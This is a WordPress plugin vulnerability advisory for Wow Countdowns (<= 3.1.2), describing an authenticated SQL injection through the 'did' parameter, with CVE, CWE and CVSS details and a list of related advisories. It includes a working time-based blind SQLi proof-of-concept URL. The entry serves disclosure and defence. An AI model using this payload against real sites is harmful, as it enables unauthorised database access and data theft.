WordPress Plugin Vulnerabilities

Wow Countdowns <= 3.1.2 - Admin+ SQLi

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection.

Proof of Concept

https://example.com/wp-admin/admin.php?page=mwp-countdown&info=del&did=1+AND+(SELECT+5382+FROM+(SELECT(SLEEP(5)))PpNt)

Affects Plugins

Plugin icon
mwp-countdown
No known fix

References

CVE
CVE-2021-25064

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
0xdecafbad
Submitter website
http://vuln.farm
Verified
Yes
WPVDB ID
30c70315-3c17-41f0-a12f-7e3f793e259c

Timeline

Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)

Other

Published
Title
Published
2023-04-06
Title
MapPress Maps for WordPress < 2.85.5 - Contributor+ SQL Injection
Published
2019-05-22
Title
WP Booking System < 1.5.2 - CSRF to Authenticated SQL Injection
Published
2020-10-21
Title
Loginizer < 1.6.4 - Unauthenticated SQL Injection
Published
2021-12-13
Title
The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection
Published
2015-12-01
Title
Email Newsletter <= 20.15 - SQL Injection